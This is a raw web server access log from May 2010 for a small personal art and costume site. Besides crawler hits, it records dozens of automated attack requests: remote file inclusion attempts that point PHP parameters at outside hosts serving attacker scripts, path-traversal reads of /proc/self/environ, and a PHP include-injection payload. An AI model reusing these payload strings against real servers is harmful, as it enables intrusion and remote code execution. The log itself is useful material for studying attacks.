211.174.62.150 - - [29/May/2010:20:21:32 -0500] "GET /logs//?_zb_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 200 7548 "-""Mozilla/5.0"
211.174.62.150 - - [29/May/2010:20:21:32 -0500] "GET /logs/access_log.1271548800//?_zb_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.174.62.150 - - [29/May/2010:20:22:15 -0500] "GET ///?_zb_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
211.174.62.150 - - [29/May/2010:20:22:15 -0500] "GET /logs///?_zb_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 200 7549 "-""Mozilla/5.0"
211.174.62.150 - - [29/May/2010:20:22:15 -0500] "GET /logs/access_log.1271548800///?_zb_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.174.62.150 - - [29/May/2010:20:22:39 -0500] "GET ///?_zb_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
211.174.62.150 - - [29/May/2010:20:22:39 -0500] "GET /logs/access_log.1271548800///?_zb_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.174.62.150 - - [29/May/2010:20:22:39 -0500] "GET /logs///?_zb_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 200 7549 "-""Mozilla/5.0"
91.121.122.40 - - [29/May/2010:20:24:16 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.yb2000.com/bbs//yes.txt??%0D?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
91.121.122.40 - - [29/May/2010:20:24:16 -0500] "GET /logs/access_log.1205107200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.yb2000.com/bbs//yes.txt??%0D?? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
91.121.122.40 - - [29/May/2010:20:24:16 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.yb2000.com/bbs//yes.txt??%0D?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
207.46.199.45 - - [29/May/2010:20:24:27 -0500] "GET /logs/access_log.1242086400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.65.59 - - [29/May/2010:20:24:35 -0500] "GET /icons/blank.gif HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
88.131.106.22 - - [29/May/2010:20:28:33 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
62.80.164.185 - - [29/May/2010:20:28:34 -0500] "GET /logs/access_log.1270771200//admin/business_inc/saveserver.php?thisdir=http://www.pdd.co.kr/bbs/script/id1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
62.80.164.185 - - [29/May/2010:20:28:34 -0500] "GET /logs/access_log.1270512000//admin/business_inc/saveserver.php?thisdir=http://www.pdd.co.kr/bbs/script/id1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
88.131.106.22 - - [29/May/2010:20:28:34 -0500] "GET /costume/ HTTP/1.0" 200 640 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
209.126.254.3 - - [29/May/2010:20:29:30 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.76"
74.14.231.236 - - [29/May/2010:20:29:30 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 286 "-""libwww-perl/5.805"
74.14.231.236 - - [29/May/2010:20:29:30 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 281 "-""libwww-perl/5.805"
209.126.254.3 - - [29/May/2010:20:29:30 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.76"
62.80.164.185 - - [29/May/2010:20:29:43 -0500] "GET /logs/access_log.1270771200//admin/business_inc/saveserver.php?thisdir=http://www.pdd.co.kr/bbs/script/id1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
62.80.164.185 - - [29/May/2010:20:29:43 -0500] "GET /logs/access_log.1270512000//admin/business_inc/saveserver.php?thisdir=http://www.pdd.co.kr/bbs/script/id1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
88.131.106.22 - - [29/May/2010:20:30:13 -0500] "GET /costume/costume1.htm HTTP/1.0" 200 2651 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
207.46.204.179 - - [29/May/2010:20:34:56 -0500] "GET /costume/ HTTP/1.1" 200 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.52 - - [29/May/2010:20:35:26 -0500] "GET /logs/access_log.1191456000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
123.243.67.208 - - [29/May/2010:20:40:26 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
87.250.255.243 - - [29/May/2010:20:49:12 -0500] "GET /logs/access_log.1273536000 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.195.230 - - [29/May/2010:20:53:57 -0500] "GET /logs/access_log.1172620800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.181 - - [29/May/2010:20:56:57 -0500] "GET /logs/access_log.1175731200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.43.194.164 - - [29/May/2010:20:57:52 -0500] "GET /logs/access_log.1271548800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
62.43.194.164 - - [29/May/2010:20:57:52 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
62.43.194.164 - - [29/May/2010:20:57:52 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
207.46.195.235 - - [29/May/2010:21:03:57 -0500] "GET /logs/access_log.1231459200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.57.250.92 - - [29/May/2010:21:06:03 -0500] "GET /logs/index.php?option=com_jeformcr&view../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
207.57.250.92 - - [29/May/2010:21:06:03 -0500] "GET /index.php?option=com_jeformcr&view../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
62.43.194.164 - - [29/May/2010:21:06:07 -0500] "GET /logs/access_log.1271894400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
62.43.194.164 - - [29/May/2010:21:06:08 -0500] "GET /logs/access_log.1272240000//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
65.52.108.58 - - [29/May/2010:21:09:57 -0500] "GET /logs/access_log.1229040000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
123.243.67.208 - - [29/May/2010:21:12:09 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
211.174.62.150 - - [29/May/2010:21:16:48 -0500] "GET /logs/access_log.1271548800/errors.php?error=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.174.62.150 - - [29/May/2010:21:16:48 -0500] "GET /logs/errors.php?error=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
211.174.62.150 - - [29/May/2010:21:16:48 -0500] "GET /errors.php?error=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
211.174.62.150 - - [29/May/2010:21:16:51 -0500] "GET /errors.php?error=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
211.174.62.150 - - [29/May/2010:21:16:51 -0500] "GET /logs/errors.php?error=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
211.174.62.150 - - [29/May/2010:21:16:51 -0500] "GET /logs/access_log.1271548800/errors.php?error=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
84.53.217.109 - - [29/May/2010:21:17:21 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
84.53.217.109 - - [29/May/2010:21:17:21 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
84.53.217.109 - - [29/May/2010:21:17:21 -0500] "GET /logs/access_log.1271548800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
207.46.13.91 - - [29/May/2010:21:20:56 -0500] "GET /logs/access_log.1244160000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [29/May/2010:21:21:40 -0500] "GET /logs/access_log.1230163200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.52 - - [29/May/2010:21:23:57 -0500] "GET /logs/access_log.1227484800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
122.112.32.51 - - [29/May/2010:21:24:10 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
122.112.32.51 - - [29/May/2010:21:24:10 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
122.112.32.51 - - [29/May/2010:21:24:10 -0500] "GET /logs/access_log.1270771200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 349 "-""Mozilla/5.0"
122.112.32.51 - - [29/May/2010:21:24:20 -0500] "GET /logs/access_log.1272412800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 349 "-""Mozilla/5.0"
87.250.255.243 - - [29/May/2010:21:33:59 -0500] "GET /logs/access_log.1273881600 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
38.101.148.126 - - [29/May/2010:21:34:12 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [29/May/2010:21:34:19 -0500] "GET /logs/access_log.1216080000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
222.122.52.80 - - [29/May/2010:21:40:31 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?%20? HTTP/1.1" 404 295 "-""Mozilla/5.0"
222.122.52.80 - - [29/May/2010:21:40:32 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?%20? HTTP/1.1" 404 300 "-""Mozilla/5.0"
222.122.52.80 - - [29/May/2010:21:40:32 -0500] "GET /logs/access_log.1271548800//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?%20? HTTP/1.1" 404 322 "-""Mozilla/5.0"
84.53.217.109 - - [29/May/2010:21:41:08 -0500] "GET /logs/access_log.1271894400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
84.53.217.109 - - [29/May/2010:21:41:13 -0500] "GET /logs/access_log.1272240000//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
125.248.150.84 - - [29/May/2010:21:41:44 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
125.248.150.84 - - [29/May/2010:21:41:44 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
125.248.150.84 - - [29/May/2010:21:41:49 -0500] "GET /logs/access_log.1271548800//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
207.46.195.235 - - [29/May/2010:21:42:27 -0500] "GET /logs/access_log.1158883200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
70.55.199.104 - - [29/May/2010:21:43:50 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ( .NET CLR 3.5.30729)"
67.195.112.180 - - [29/May/2010:21:49:43 -0500] "GET /logs/access_log.1219708800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.44 - - [29/May/2010:21:53:57 -0500] "GET /logs/access_log.1221350400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.53 - - [29/May/2010:21:54:28 -0500] "GET /logs/access_log.1223251200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.236.47.182 - - [29/May/2010:22:03:26 -0500] "GET //skin/uks_qnaboard_v2010////write.php?dir=http://antony.freewebhostx.com/data/id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
222.236.47.182 - - [29/May/2010:22:03:26 -0500] "GET /logs//skin/uks_qnaboard_v2010////write.php?dir=http://antony.freewebhostx.com/data/id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
222.236.47.182 - - [29/May/2010:22:03:29 -0500] "GET /logs/access_log.1271289600//skin/uks_qnaboard_v2010////write.php?dir=http://antony.freewebhostx.com/data/id1.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
222.236.47.182 - - [29/May/2010:22:03:30 -0500] "GET /logs/access_log.1270598400//skin/uks_qnaboard_v2010////write.php?dir=http://antony.freewebhostx.com/data/id1.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
222.236.47.182 - - [29/May/2010:22:05:25 -0500] "GET //skin/uks_qnaboard_v2010////write.php?dir=http://antony.freewebhostx.com/data/id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
222.236.47.182 - - [29/May/2010:22:05:25 -0500] "GET /logs/access_log.1271289600//skin/uks_qnaboard_v2010////write.php?dir=http://antony.freewebhostx.com/data/id1.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
222.236.47.182 - - [29/May/2010:22:05:25 -0500] "GET /logs//skin/uks_qnaboard_v2010////write.php?dir=http://antony.freewebhostx.com/data/id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
222.236.47.182 - - [29/May/2010:22:06:08 -0500] "GET /logs/access_log.1270598400//skin/uks_qnaboard_v2010////write.php?dir=http://antony.freewebhostx.com/data/id1.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
222.236.47.182 - - [29/May/2010:22:06:48 -0500] "GET //skin/uks_qnaboard_v2010////write.php?dir=http://antony.freewebhostx.com/data/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
222.236.47.182 - - [29/May/2010:22:06:48 -0500] "GET /logs//skin/uks_qnaboard_v2010////write.php?dir=http://antony.freewebhostx.com/data/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
222.236.47.182 - - [29/May/2010:22:06:48 -0500] "GET /logs/access_log.1271289600//skin/uks_qnaboard_v2010////write.php?dir=http://antony.freewebhostx.com/data/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
222.236.47.182 - - [29/May/2010:22:06:50 -0500] "GET /logs/access_log.1270598400//skin/uks_qnaboard_v2010////write.php?dir=http://antony.freewebhostx.com/data/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
219.83.122.110 - - [29/May/2010:22:09:49 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
219.83.122.110 - - [29/May/2010:22:09:49 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
219.83.122.110 - - [29/May/2010:22:09:49 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
219.83.122.110 - - [29/May/2010:22:09:57 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
219.83.122.110 - - [29/May/2010:22:09:57 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
219.83.122.110 - - [29/May/2010:22:09:57 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
193.41.235.46 - - [29/May/2010:22:10:00 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
193.41.235.46 - - [29/May/2010:22:10:01 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
219.83.122.110 - - [29/May/2010:22:10:08 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
219.83.122.110 - - [29/May/2010:22:10:08 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
219.83.122.110 - - [29/May/2010:22:10:08 -0500] "GET /logs/access_log.1271548800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
80.233.172.42 - - [29/May/2010:22:10:10 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.233.172.42 - - [29/May/2010:22:10:10 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
67.195.112.180 - - [29/May/2010:22:10:39 -0500] "GET /logs/access_log.1240790400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
78.41.204.220 - - [29/May/2010:22:10:42 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
78.41.204.220 - - [29/May/2010:22:10:42 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
78.41.204.220 - - [29/May/2010:22:10:43 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
78.41.204.220 - - [29/May/2010:22:10:43 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
192.167.114.31 - - [29/May/2010:22:10:48 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.820"
192.167.114.31 - - [29/May/2010:22:10:48 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.820"
80.233.172.42 - - [29/May/2010:22:10:48 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.233.172.42 - - [29/May/2010:22:10:48 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
219.83.122.110 - - [29/May/2010:22:11:11 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
208.115.111.248 - - [29/May/2010:22:11:12 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
219.83.122.110 - - [29/May/2010:22:11:20 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
219.83.122.110 - - [29/May/2010:22:11:20 -0500] "GET /logs/access_log.1271548800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
219.83.122.110 - - [29/May/2010:22:11:20 -0500] "GET /logs/access_log.1271894400//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
219.83.122.110 - - [29/May/2010:22:11:55 -0500] "GET /logs/access_log.1223683200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
38.101.148.126 - - [29/May/2010:22:15:48 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [29/May/2010:22:15:54 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
207.46.13.142 - - [29/May/2010:22:18:57 -0500] "GET /logs/access_log.1265241600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [29/May/2010:22:20:52 -0500] "GET /artwork/sculptures.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [29/May/2010:22:22:14 -0500] "GET /logs/access_log.1160179200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.217.161.222 - - [29/May/2010:22:23:08 -0500] "GET /logs/access_log.1271548800/modules/My_eGallery/index.php?basepath=http://www.rfpgcollege.com/newsite/id1.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
67.217.161.222 - - [29/May/2010:22:23:08 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.rfpgcollege.com/newsite/id1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
67.217.161.222 - - [29/May/2010:22:23:08 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.rfpgcollege.com/newsite/id1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
67.217.161.222 - - [29/May/2010:22:23:35 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.rfpgcollege.com/newsite/id1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
67.217.161.222 - - [29/May/2010:22:23:35 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.rfpgcollege.com/newsite/id1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
67.217.161.222 - - [29/May/2010:22:23:35 -0500] "GET /logs/access_log.1271548800/modules/My_eGallery/index.php?basepath=http://www.rfpgcollege.com/newsite/id1.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
84.40.30.37 - - [29/May/2010:22:23:41 -0500] "GET /logs/access_log.1271462400/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 353 "-""Mozilla/5.0"
84.40.30.37 - - [29/May/2010:22:23:41 -0500] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
